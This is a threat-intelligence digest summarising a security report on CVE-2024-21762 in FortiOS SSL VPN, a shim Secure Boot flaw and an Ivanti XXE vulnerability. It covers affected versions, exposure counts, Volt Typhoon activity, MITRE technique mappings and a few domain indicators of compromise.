Threat Research

RCEs in FortiOS SSL VPN, ‘shim’; Latest Ivanti Flaw Possibly Exploited (CVE-2024-21762, CVE-2023-40547, CVE-2024-22024) – SOCRadar® Cyber Intelligence Inc.

Securonix

Fortinet’s FortiOS SSL VPN is affected by a critical Remote Code Execution vulnerability (CVE-2024-21762) with PoC exploits and active exploitation chatter, alongside related issues in Shim (CVE-2023-40547) and Ivanti (CVE-2024-22024). The report also highlights threat actor activity (VolT Typhoon) and broad exposure measured by Shadowserver scans, plus growing attention to vulnerability intelligence and mitigation measures. #CVE-2024-21762 #CVE-2023-40547 #CVE-2024-22024 #VoltTyphoon #FortiOS #Ivanti #Shadowserver

Keypoints

  • FortiOS SSL VPN vulnerability CVE-2024-21762 enables unauthenticated RCE via crafted requests (high CVSS score).
  • Affected FortiOS versions include 7.6, 7.4, 7.2, 7.0, 6.4, 6.2, and 6.0; upgrading is advised.
  • Shadowserver scans indicate about 150,000 FortiOS/FortiProxy instances are vulnerable, with the US leading in count.
  • A PoC exploit for CVE-2024-21762 surfaced on hacker forums; a Python-based PoC is available on GitHub.
  • Volt Typhoon, a Chinese state-sponsored actor, has targeted FortiOS vulnerabilities; CISA KEV guidance emphasizes patching.
  • Shim security updates (CVE-2023-40547) fix a Secure Boot bypass risk across Linux; six CVEs were addressed in shim 15.8.
  • Ivanti CVE-2024-22024 (XXE in SAML) is under advisories; some community chatter claims active exploitation; DNS-based IOCs are noted.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – FortiOS SSL VPN vulnerability CVE-2024-21762 enables unauthenticated attackers to execute RCE through maliciously crafted requests. Quote: “…It enables unauthenticated attackers to execute RCE through maliciously crafted requests…”
  • [T1059.006] Python – PoC for CVE-2024-21762 is provided as a Python script, used to interact with target systems via sockets and payloads. Quote: “…A PoC exploit in the form of a Python script is provided on GitHub, based on the researcher’s technical analysis…”
  • [T1542.001] Boot or Logon Autostart: Shim/Pre-OS Boot – Shim vulnerability CVE-2023-40547 could lead to Secure Boot bypass. Quote: “…could lead to Secure Boot bypass.”
  • [T1046] Network Service Scanning – Shadowserver scanning activity and large-scale exposure indicate scanning of FortiOS/FortiProxy devices; Quote: “Nearly 150,000 FortiOS Devices Are Vulnerable to CVE-2024-21762.”
  • [T1190] Exploit Public-Facing Application – Ivanti CVE-2024-22024 XXE vulnerability in Ivanti products; Quote: “XML External Entity (XXE) vulnerability in the SAML component, impacting Ivanti products’ versions 9.x and 22.x.”

Indicators of Compromise

  • [Domain] Ivanti Pulse DNS queries – oastify.com, burptest.tssrt.de
  • [IP Address] DNS PTR query – 255.255.255.255.in-addr.arpa

Read more: https://socradar.io/rces-in-fortios-ssl-vpn-shim-latest-ivanti-flaw-possibly-exploited-cve-2024-21762-cve-2023-40547-cve-2024-22024/